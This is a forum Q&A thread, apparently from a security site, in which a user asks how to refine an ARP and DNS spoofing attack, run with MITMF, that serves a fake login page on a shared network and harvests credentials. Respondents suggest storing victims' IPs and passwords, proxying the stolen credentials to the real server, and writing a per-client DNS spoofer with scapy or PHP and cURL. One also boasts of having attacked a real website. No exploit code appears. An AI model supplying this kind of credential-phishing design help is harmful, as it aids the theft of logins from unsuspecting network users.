4

Preface: I had an argument with a buddy the other day, he said it was impossible I disagreed. So say I have a large network of computers all visiting the same website for some reason. Then I have a DNS redirect from login.php (The original site). I will supply a fake login page from my own apache server (fake.php). Is there a way to stop the spoof or redirect in a way that it wont be intercepted and spoofed again when a user logs in?

So the user goes to login.php
User is redirected to fake.php
Types in fake credentials
***Redirects to login.php to login for real this time.
***End spoofing for that specific IP, or redirect in a way where the user wont be spoofed again.

The only problem is if I do redirect to login.php after a login it will be spoofed again! Is there any way to stop this? I thought about not using UDP port 53 (Which is what MITMF's DNS plug in uses). But how can I redirect then? Direct GET/POST data and print the output externally?

I am using MITMF with arp and dns spoof. Any Ideas?

Creg
  • 71
  • 3

1 Answers1

1

Interesting question. If i understand correctly: fake.php is the frontend to login.php on the main server, and you are spoofing both.

If i am, then:

I would record the user's internal IP, and credentials, then store it. if the ip that visits login has been there before, forward the data to the real server. If the password is correct (check using some kind of regex kung-fu), great, step out of the equation. If it isn't, forward the incorrect password page and go back to fake.php, repeat the process and replace the incorrect credentials stored with the correct ones.

I would personally recommend using scapy or bettercap.

dGRAMOP
  • 280
  • 1
  • 9
  • In theory it would run over a large network so I would keep it running non-stop. So how could I stop spoofing that specific I.P? – Creg Oct 07 '16 at 02:27
  • You don't, instead, you act as a normal proxy. – dGRAMOP Oct 07 '16 at 02:28
  • Basically, you don't replace the page for him. – dGRAMOP Oct 07 '16 at 02:29
  • But how MITMF and BETTERCAP's DNS redirect will auto redirect the DNS query when found. So if I redirect the user to the original site to login for real, their DNS query will be spoofed again. So it becomes a infinite loop. – Creg Oct 07 '16 at 02:33
  • 1) Why are you using both arp and dns – dGRAMOP Oct 07 '16 at 02:34
  • 2) Why not write a dynamic DNS, you have the DNS server, you respond to the user based on his IP – dGRAMOP Oct 07 '16 at 02:35
  • ...Read the scenario again. Large insecure network. I need to DNS spoof the users on the network....So...ARP. – Creg Oct 07 '16 at 02:35
  • There has to be some way where you can use or write a DNS server that will respond to different clients w. different values. It is VERY possible. – dGRAMOP Oct 07 '16 at 02:36
  • I see what you mean. Use a DNS server that is highly customisable. – dGRAMOP Oct 07 '16 at 02:37
  • Sure obviously you can do that, but what about redirecting to the fake login? Even if I dynamically respond and redirect based on past I.P's, redirection will cause a never ending loop due to MITMF DNS spoof. – Creg Oct 07 '16 at 02:38
  • Are you spoofing DNS responses 1 by 1? Or are you spoofing a whole DNS server? – dGRAMOP Oct 07 '16 at 02:40
  • Either way it is still possible – dGRAMOP Oct 07 '16 at 02:41
  • Scapy is reccomended – dGRAMOP Oct 07 '16 at 02:41
  • Add some scapy code to your answer. – Creg Oct 07 '16 at 02:44
  • @Creg It has been a while since I pythoned, sorry. I do know it is possible, and I will try and link the documentation for you – dGRAMOP Oct 07 '16 at 02:46
  • http://www.secdev.org/projects/scapy/demo.html – dGRAMOP Oct 07 '16 at 02:47
  • Basically, get the req sender, if it is already registered, then respond with appropriate DNS (do a DNS request to 8.8.8.8, then forward it along, leave it in the same packet, change the from & to (reminds me of regifting).) if not, spoof the DNS – dGRAMOP Oct 07 '16 at 02:49
  • I've programmed with scapy before for packet sniffing my own custom images before I knew how HTTP and HSTS worked. Either way I just don't know how to go about this particulate hypothetical. I'll just wait, it seems very possible. So someone on here has got to know how to do it. Then my buddy will say 'darn.' – Creg Oct 07 '16 at 02:50
  • Actually smart, but doing that real time with php? How will I check for login attempts and save the php? I could edit a log file with both the scapy module and the server, but that sounds like a bad idea for multiple reasons. – Creg Oct 07 '16 at 02:52
  • I would love to work with you on this. It is just that I am kind of brain ded right now, I will try to get back to you. You can PM me now, we can exchange emails, and I can try and help you code. – dGRAMOP Oct 07 '16 at 02:53
  • How about using nodejs as the proxy? – dGRAMOP Oct 07 '16 at 02:53
  • Or you can do it in PHP - exactly. You can spoof both the files, and the PHP will be the one that stores the IP, and the PHP will act as the proxy (I reccomend using cURL, and setting the user agent string to firefox (that is how I took out an attack on a real website once upon a time)) – dGRAMOP Oct 07 '16 at 02:55
  • Let's say I go with that, the PHP will check the IP to see if it has already logged in on the fake apache server. Great. But say it notices a user that has? What will it to, redirect it to the original site login? Then when it redirects to the original site login the original site login will be redirected again by the MITMF DNS spoof. Then my site will redirect back to theres and theres back to mine in a never ending loop. I have tested it. I think I'll try using scapy to log IP's that have been redirected already, and stop those IP's from being redirected again. – Creg Oct 07 '16 at 15:10
  • I have been in the very same situation as you, and I found a way out... I just can't remember how. :D – dGRAMOP Oct 09 '16 at 03:22